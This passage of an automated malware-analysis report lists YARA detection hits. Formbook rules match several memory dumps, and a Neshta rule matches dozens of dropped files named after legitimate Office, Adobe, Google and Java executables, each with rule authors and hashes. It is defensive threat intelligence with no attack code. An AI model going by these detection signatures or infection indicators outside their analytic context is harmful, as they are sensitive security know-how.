          Source: 00000005.00000003.395354644.00000000021C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
